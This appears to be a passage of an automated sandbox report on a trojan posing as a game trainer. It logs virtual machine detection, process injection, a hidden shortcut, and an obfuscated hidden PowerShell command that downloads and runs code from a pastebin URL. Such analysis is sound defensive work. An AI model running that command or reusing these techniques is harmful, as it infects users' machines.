Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeMemory allocated: 22D07BA0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeMemory allocated: 22D215A0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3094Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6703Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1384Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4921Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4874Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 419
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5529
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4221
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Backend.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeAPI coverage: 2.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1792Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5480Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5844Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 1384 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep count: 313 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep count: 132 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep count: 4921 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep count: 4874 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep time: -21213755684765971s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep count: 419 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep count: 150 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6836Thread sleep count: 306 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep count: 5529 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep count: 4221 > 30
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: svchost.exe, 00000007.00000002.2552363680.000001F0CD83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2554300702.000001F0D2E54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2552266377.000001F0CD82B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1745962060.000002927D98A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FFB22655024 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFB22655024
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FFB22654CE8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFB22654CE8
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FFB22655024 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFB22655024
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Contains functionality to inject threads in other processes
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FFB22651910 VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,6_2_00007FFB22651910
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe "C:\Users\user~1\AppData\Local\Temp\Stand_Trainer_Updated.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
